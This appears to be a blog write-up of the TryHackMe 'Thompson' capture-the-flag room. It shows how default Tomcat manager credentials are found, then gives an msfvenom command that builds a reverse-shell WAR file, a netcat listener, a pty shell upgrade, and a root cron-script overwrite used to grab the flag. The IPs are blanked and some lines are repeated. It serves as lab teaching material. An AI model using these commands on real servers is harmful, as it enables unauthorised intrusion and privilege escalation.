
G N Vivekananda
4 min readJun 29, 2021

Dear friends, let us solve challenges in the Thompson box present in the below link.

Visit and join the room.


Attacker i/p-

Today I’m going to show you a Tomcat-related CTF challenge. This is a boo2root machine write-up by Guatemala. Let’s get started and explore vulnerabilities and exploits in this machine.

After hitting the deploy button, we now have our IP address (before starting, check whether the IP is live by pinging ).


I have used Nmap to check for open ports and services.

nmap -Pn -A

From the nmap scan result, we came to know that three ports are open, and they are 22/TCP ssh, 8009/TCP Apache Jserv, and 8080/TCP HTTP. Let’s check out port 8080 on the browser and click on Manager App.

I clicked on Manager App, and it required credentials.

When you cancel the authentication required pop-up, you will get the credentials within the 401 unauthorized page.

There you can see username: tomcat, password: s3cret

Using those credentials, I was able to log into the server.


Before logging in, I had googled on the internet that there is exploitation, which is CVE-2017–12617. This exploitation is known as the WAR backdoor. There is numerous proof of concept of this vulnerability. To use this exploit, one must know the login credential of the manager page.

Things seemed pretty straightforward from here. First, we have to upload a malicious war file. I generated the war file using msfvenom. So, let’s upload the reverse shell (reverse shell was generated using msfvenom).

msfvenom -p java/jsp_shell_reverse_tcp lhost= lport=4444 -f war -o shell.war

Set up a listener using netcat (you can use Metasploit ), uploaded the war file to the server, deployed in, and got a shell in our box

nc -lnvp 4444

Set up a listener using netcat (you can use Metasploit ), uploaded the war file to the server, deployed in, and got a shell in our box

We have a shell !!!!!! Sweet. Now I upgraded my shell to a fully interactive shell.

To get the interactive shell, we used the following spawning

python -c ‘import pty; pty.spawn(“/bin/bash”)’


Usually, the file is executed by root users, but it has responded to the test.txt file. Let’s check inside the crontab.

There’s a file called id at home. We do not own it, but we can write to it. Looking at the contents of the bash script. Now it’s time for privilege escalation. By now, you know the drill, uploading a script that checks for privilege escalation vectors and running it. The script that I normally use is linpeas.

We will fetch the root.txt flag from the root user by overwriting the using the command. I edited and replaced it with the following command

echo “cp /root/root.txt /home/jack/root.txt” > id. sh

What it essentially does is cat the root flag and the output stored in a file called test.txt

After some time, I ‘cat’ the contents of the test.txt, and boom, we have the root flag.

root.txt flag:


Done!!!!!! Let us see the answers to the challenge questions now.

Task 1 Thompson

read user.txt and root.txt

Answer the questions below





At last….We got user.txt and root.txt flags, and the Thompson room of tryhackme is completed. Thanks for reading, and I hope you enjoyed it too. As I always mention in every blog, suggestions are always welcome and open for discussion. Happy Hacking….

